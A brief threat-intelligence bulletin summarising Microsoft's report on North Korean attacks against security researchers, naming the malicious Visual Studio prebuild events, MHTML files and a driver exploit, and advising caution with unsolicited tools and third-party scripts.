In a new report, Microsoft disclosed that they have been tracking multiple DPRK tactics in their targeting of offensive security professionals. On Tuesday, when this news was first announced, a Visual Studio C# project with a malicious prebuild event was a known attack vector. Based on Microsoft’s report, more is known about what the attackers used to gain information.
One such vector was using a malicious MHTML file to execute JavaScript locally on a device through Internet Explorer. Another method included a driver load to exploit CVE-2017-16238, but due to the driver mishandling of the exploit, the driver instead just crashes the user’s device.
Analyst Notes
With the DPRK targeting offensive security researchers, taking personal measures to protect oneself is more important than ever. This is especially true for people who are publicly active in research for both the security industry’s offensive and defensive sides. If messages are received from strangers making offers of exploits or tools not yet publicly disclosed, treat them with caution. Moreover, if third party tools like scripts are being used in one’s organization, read the source code of the script. Take time to investigate and understand what the script is doing and discuss the security implications with coworkers and trusted individuals.
References:
https://www.bleepingcomputer.com/news/security/microsoft-dprk-hackers-likely-hit-researchers-with-chrome-exploit/
https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/
